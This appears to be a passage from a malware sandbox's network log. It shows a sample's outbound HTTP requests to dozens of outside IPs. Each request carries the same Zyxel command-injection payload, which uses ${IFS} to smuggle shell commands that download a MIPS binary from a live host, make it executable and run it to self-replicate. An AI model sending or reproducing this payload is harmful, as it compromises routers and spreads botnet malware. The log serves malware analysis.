                                              Jan 29, 2024 07:04:02.252808094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7345192.168.2.144681218.75.237.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252840042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7346192.168.2.1456798207.240.112.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252883911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7347192.168.2.144161638.185.26.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252934933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7348192.168.2.1451238203.104.8.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252974033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7349192.168.2.1460434105.68.34.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253020048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7350192.168.2.1433104199.246.159.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253047943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7351192.168.2.1437428150.138.212.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253094912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7352192.168.2.143768860.189.246.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253149986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7353192.168.2.1456264187.193.56.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253184080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7354192.168.2.143686624.126.73.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253215075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7355192.168.2.1455238212.165.104.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253290892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7356192.168.2.1451548150.111.191.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253314972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7357192.168.2.1452748187.65.233.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253364086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7358192.168.2.1434970171.227.139.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253397942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7359192.168.2.1448608121.69.97.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253428936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7360192.168.2.143374823.138.169.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253454924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7361192.168.2.145802284.176.171.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253498077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7362192.168.2.143967431.111.139.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253535986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7363192.168.2.143365627.163.41.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253585100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7364192.168.2.1440256122.251.116.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253618002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7365192.168.2.144548251.119.156.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253673077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7366192.168.2.145497484.81.137.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253700972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7367192.168.2.1439512142.89.251.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253737926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7368192.168.2.1457334139.172.65.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253772020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7369192.168.2.145833068.221.80.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253818035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7370192.168.2.1445326192.76.161.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253849983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7371192.168.2.1453464162.218.147.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253892899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7372192.168.2.144182894.135.21.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253940105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7373192.168.2.1452276163.238.112.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.253966093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7374192.168.2.144460649.44.183.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254014015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7375192.168.2.143830060.62.56.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254045963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7376192.168.2.144169296.47.119.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254065990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7377192.168.2.143870249.79.63.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254101992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7378192.168.2.143565463.189.35.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254151106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7379192.168.2.1459112147.131.32.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254182100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7380192.168.2.1459924156.56.19.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254226923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7381192.168.2.145254614.158.12.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254254103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7382192.168.2.1453240115.240.88.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254308939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7383192.168.2.1457018217.244.210.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254354954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7384192.168.2.143732246.227.37.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254391909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7385192.168.2.14333704.178.39.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254431963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7386192.168.2.1442690116.37.61.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254472017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7387192.168.2.145443482.229.44.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254512072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7388192.168.2.1449834181.84.77.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254569054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7389192.168.2.1436814149.119.188.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254601002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7390192.168.2.1438584172.79.125.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254642010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7391192.168.2.143836072.2.39.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254679918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7392192.168.2.144450225.62.229.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254713058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7393192.168.2.146028864.198.152.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254760981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7394192.168.2.145639423.4.125.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254801989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7395192.168.2.1436662187.50.87.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254853964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7396192.168.2.143402293.109.103.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254903078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7397192.168.2.1439156213.116.244.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254925966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7398192.168.2.1459170129.222.10.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.254985094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7399192.168.2.145567036.169.106.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255033970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7400192.168.2.1456250116.156.118.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255065918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7401192.168.2.145126691.115.123.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255125046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7402192.168.2.143631083.250.140.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255172968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7403192.168.2.1447918219.128.132.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255186081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7404192.168.2.145201687.18.11.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255228043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7405192.168.2.143915225.252.136.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255259037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7406192.168.2.14454864.25.56.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255285978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7407192.168.2.145679653.143.48.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.255319118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7408192.168.2.143525272.195.65.152443
                                              TimestampBytes transferredDirectionData
